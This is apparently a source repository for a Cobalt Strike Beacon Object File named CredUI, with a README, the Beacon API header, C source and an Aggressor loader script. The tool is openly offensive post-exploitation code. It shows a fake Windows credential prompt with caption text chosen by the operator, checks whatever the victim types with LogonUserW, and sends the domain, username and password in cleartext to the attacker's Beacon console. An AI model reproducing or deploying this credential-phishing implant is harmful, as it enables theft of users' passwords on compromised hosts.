├── README.md
├── beacon.h
├── command.png
├── credui.c
├── credui.cna
├── credui.x64.o
├── credui.x86.o
└── prompt.png


/README.md:
--------------------------------------------------------------------------------
 1 | # BOF - Credentials Collection via CredUIPromptForWindowsCredentials
 2 | 
 3 |  Invokes Windows credential prompt using Windows API `CredUIPromptForWindowsCredentials` and verify the credential with `LogonUser` subsequently.
 4 | 
 5 | ![](command.png)
 6 | 
 7 | ![](prompt.png)
 8 | ----
 9 | 
10 | 
11 | 
12 | ### Usage
13 | 
14 | ```
15 | credui "Caption" "Message"
16 | ```
17 | 
18 | 
19 | 
20 | ### Compile
21 | 
22 | ```
23 | cl.exe /c /GS- credui.c /Focredui.x86.o
24 | ```
25 | 
26 | 
27 | 
28 | ### References
29 | 
30 | + [Credentials Collection via CredUIPromptForCredentials](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/credentials-collection-via-creduipromptforcredentials) from ired


--------------------------------------------------------------------------------
/beacon.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * Beacon Object Files (BOF)
 3 |  * -------------------------
 4 |  * A Beacon Object File is a light-weight post exploitation tool that runs
 5 |  * with Beacon's inline-execute command.
 6 |  *
 7 |  * Cobalt Strike 4.1.
 8 |  */
 9 | 
10 | /* data API */
11 | typedef struct {
12 | 	char * original; /* the original buffer [so we can free it] */
13 | 	char * buffer;   /* current pointer into our buffer */
14 | 	int    length;   /* remaining length of data */
15 | 	int    size;     /* total size of this buffer */
16 | } datap;
17 | 
18 | DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
19 | DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
20 | DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
21 | DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
22 | DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
23 | 
24 | /* format API */
25 | typedef struct {
26 | 	char * original; /* the original buffer [so we can free it] */
27 | 	char * buffer;   /* current pointer into our buffer */
28 | 	int    length;   /* remaining length of data */
29 | 	int    size;     /* total size of this buffer */
30 | } formatp;
31 | 
32 | DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
33 | DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
34 | DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
35 | DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
36 | DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
37 | DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
38 | DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
39 | 
40 | /* Output Functions */
41 | #define CALLBACK_OUTPUT      0x0
42 | #define CALLBACK_OUTPUT_OEM  0x1e
43 | #define CALLBACK_ERROR       0x0d
44 | #define CALLBACK_OUTPUT_UTF8 0x20
45 | 
46 | DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
47 | DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
48 | 
49 | /* Token Functions */
50 | DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
51 | DECLSPEC_IMPORT void   BeaconRevertToken();
52 | DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
53 | 
54 | /* Spawn+Inject Functions */
55 | DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
56 | DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
57 | DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
58 | DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
59 | 
60 | /* Utility Functions */
61 | DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);
62 | 


--------------------------------------------------------------------------------
/command.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hagrid29/BOF-CredUI/735e0ea7c5f38dd3be31a281ab7ac3b0f54c5bbc/command.png


--------------------------------------------------------------------------------
/credui.c:
--------------------------------------------------------------------------------
 1 | #include <windows.h>
 2 | #include <wincred.h>
 3 | 
 4 | #include "beacon.h"
 5 | 
 6 | 
 7 | DECLSPEC_IMPORT DWORD WINAPI CREDUI$CredUIPromptForWindowsCredentialsW(PCREDUI_INFOA pUiInfo, DWORD dwAuthError, ULONG* pulAuthPackage, LPCVOID pvInAuthBuffer, ULONG ulInAuthBufferSize, LPVOID* ppvOutAuthBuffer, ULONG* pulOutAuthBufferSize, BOOL* pfSave, DWORD dwFlags);
 8 | DECLSPEC_IMPORT DWORD WINAPI CREDUI$CredUnPackAuthenticationBufferW(DWORD dwFlags, PVOID pAuthBuffer, DWORD cbAuthBuffer, LPSTR pszUserName, DWORD* pcchlMaxUserName, LPSTR pszDomainName, DWORD* pcchMaxDomainName, LPSTR pszPassword, DWORD* pcchMaxPassword);
 9 | WINBASEAPI DWORD WINAPI ADVAPI32$LogonUserW(LPCSTR lpszUsername, LPCSTR lpszDomain, LPCSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken);
10 | 
11 | 
12 | void launch(char * args, int alen)
13 | {
14 | 	datap parser;
15 | 	BeaconDataParse(&parser, args, alen);
16 | 
17 | 	CREDUI_INFO ci = { sizeof(ci) };
18 | 	wchar_t* promptCaption = (WCHAR*) BeaconDataExtract(&parser, NULL);
19 | 	wchar_t* promptMessage = (WCHAR*) BeaconDataExtract(&parser, NULL);
20 | 
21 | 	ci.pszCaptionText = (PCWSTR)promptCaption;
22 | 	ci.pszMessageText = (PCWSTR)promptMessage;
23 | 
24 | 	DWORD result = 0;
25 | 
26 | 	ULONG pulAuthPackage = 0;
27 | 	LPVOID ppvOutAuthBuffer = NULL;
28 | 	ULONG pulOutAuthBufferSize = 0;
29 | 	BOOL pfSave = FALSE;
30 | 
31 | 
32 | 	result = CREDUI$CredUIPromptForWindowsCredentialsW(
33 | 		&ci, 0, &pulAuthPackage, NULL, 0, &ppvOutAuthBuffer, &pulOutAuthBufferSize, &pfSave, 1
34 | 	);
35 | 
36 | 	wchar_t pszUserName[256];
37 | 	DWORD pcchlMaxUserName = 256;
38 | 	wchar_t pszDomainName[256];
39 | 	DWORD pcchMaxDomainName = 256;
40 | 	wchar_t pszPassword[256];
41 | 	DWORD pcchMaxPassword = 256;
42 | 
43 | 	if (CREDUI$CredUnPackAuthenticationBufferW(
44 | 		0,
45 | 		ppvOutAuthBuffer,
46 | 		pulOutAuthBufferSize,
47 | 		pszUserName,
48 | 		&pcchlMaxUserName,
49 | 		pszDomainName,
50 | 		&pcchMaxDomainName,
51 | 		pszPassword,
52 | 		&pcchMaxPassword))
53 | 	{
54 | 
55 | 		HANDLE newToken = NULL;
56 | 		if (ADVAPI32$LogonUserW(pszUserName, pszDomainName, pszPassword, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &newToken)) {
57 | 			BeaconPrintf(CALLBACK_OUTPUT, "Valid Credential\n\tDomain: %ls\n\tUsername: %ls\n\tPassword: %ls", pszDomainName, pszUserName, pszPassword);
58 | 		}
59 | 		else {
60 | 			BeaconPrintf(CALLBACK_OUTPUT, "Invalid Credential\n\tDomain: %ls\n\tUsername: %ls\n\tPassword: %ls", pszDomainName, pszUserName, pszPassword);
61 | 		}
62 | 
63 | 
64 | 	}
65 | 	
66 | 
67 | 	return 0;
68 | }


--------------------------------------------------------------------------------
/credui.cna:
--------------------------------------------------------------------------------
 1 | alias credui {
 2 | 	
 3 | 	# figure out the arch of this session
 4 | 	$barch  = barch($1);
 5 | 	
 6 | 	# read in the right BOF file
 7 | 	$handle = openf(script_resource("credui. $+ $barch $+ .o"));
 8 | 	$data   = readb($handle, -1);
 9 | 	closef($handle);
10 | 	
11 | 	# pack our arguments
12 | 	$args   = bof_pack($1, "ZZ", $2, $3);
13 | 	
14 | 	# execute it
15 | 	beacon_inline_execute($1, $data, "launch", $args);
16 | }


--------------------------------------------------------------------------------
/credui.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hagrid29/BOF-CredUI/735e0ea7c5f38dd3be31a281ab7ac3b0f54c5bbc/credui.x64.o


--------------------------------------------------------------------------------
/credui.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hagrid29/BOF-CredUI/735e0ea7c5f38dd3be31a281ab7ac3b0f54c5bbc/credui.x86.o


--------------------------------------------------------------------------------
/prompt.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Hagrid29/BOF-CredUI/735e0ea7c5f38dd3be31a281ab7ac3b0f54c5bbc/prompt.png


--------------------------------------------------------------------------------